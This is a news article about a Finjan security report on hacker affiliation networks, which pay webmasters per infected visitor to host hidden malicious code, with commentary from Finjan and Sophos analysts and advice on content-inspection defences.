Next Big Threat: Affiliation Networks for Hackers
The next big threat to Web security has less to do with phishing and more to do with affiliation networks, according to a recent Web security report.
According to Finjan, a San Jose, Calif.-based Web security provider, hackers are now using sophisticated affiliation networks that provide a hosting model for malicious code. Webmasters and bloggers who include the infected code on their sites are then paid according to the number of infected visitors they accumulate.
Think Google AdSense -- but for hackers.
Users who run blogs or small Web sites can generate small money through services such as Google AdSense or DoubleClick.
"You hope somebody will click on those ads to get some pennies," Yuval Ben-Itzhak, CTO of Finjan, said. "But, hackers have realized that with their own affiliation programs, they can encourage bloggers and Webmasters to include their hidden ads in exchange for big dollars."
In a malicious code package obtained by Finjan, payouts are shown to range from as low as US$15 to as high as $500 (per 1000 infected users) depending on the country. Interestingly, generating infected users from Australia will earn affiliates the high dollar amount.
Ben-Itzhak said that these hackers can afford pay these huge rates because of the valuable information they gather from infected users.
"The malicious code includes Trojans and keyloggers that collect data, such as credit card information, which is later sold online for big profits," Ben-Itzhak said. "And because the code is hidden, everyone visiting the site won't suspect it's been compromised and the Webmaster won't be alerted either."
Ronald O'Brien, senior security analyst at anti-spam software provider Sophos, said that this form of infection is often seen in Web 2.0 sites such as Wikipedia and MySpace because they allow user editing. However, he said, these techniques have now made their way to traditional Web sites.
"Web sites that don't necessarily promote editing, but because they are architecturally insecure, allow this type of hacking to occur," O'Brien said. "Plus, people who threw up Web sites for the purpose of having a presence on the Web, often did so by using an open-source code, and this has effectively left the keys in the lock for hackers to exploit."
But Ben-Itzhak said, pretty much any site can be at risk, as these affiliation network techniques have even been used when compromising highly popular Web sites or government domains.
"When we contact the site owners, they are usually surprised and don't believe they are infected," he said. "But when we show them the code they are shocked."
Ben-Itzhak said that hackers who can successfully insert malicious code into highly popular and reputable sites are often in a win-win situation. "Firstly, the high-traffic Web sites lead to more users," he said. "Secondly, these high-traffic sites will never be blocked by URL filtering and reputation services because they are established domains."
This represents a major change from several years ago, when hackers were content with simply changing a Web site's graphics in order to prove they had defaced it, Ben-Itzhak said.
Statistically, he estimated about 90 percent of malware code found on the Internet today is using hidden code techniques, whether on high-traffic sites or through affiliation partnerships.
O'Brien agreed, while also citing his company's research to the increase in malicious Web content.
"At the beginning of this year, we were seeing on average between 5,000 and 7,000 Web pages a day that were hosting malicious content," O'Brien said. "This past June, just six months later, that number is at 29,000 pages per day."
With these invisible techniques, nothing is being aesthetically changed on the page. And coupling this with the affiliation program may prove to be a deadly combination.
"These malware writers are basically introducing business concepts into there operation," O'Brien said. "They are actually measuring the effectiveness of their affiliates and paying them accordingly. We have simply never seen this level of sophistication."
For IT managers wanting to protect their employees while surfing the Web at work, Ben-Itzhak advices enterprises to add a security product that relies on real-time content inspection rather than URL or reputation attributes.
"I would add a technology that inspects the content as it's about to enter the network and based on the intended behavior of that code," Ben-Itzhak said. "If the code is about to change settings, install software, or delete files on my end-user machine, the code would be blocked on that parameter and not go inside the network."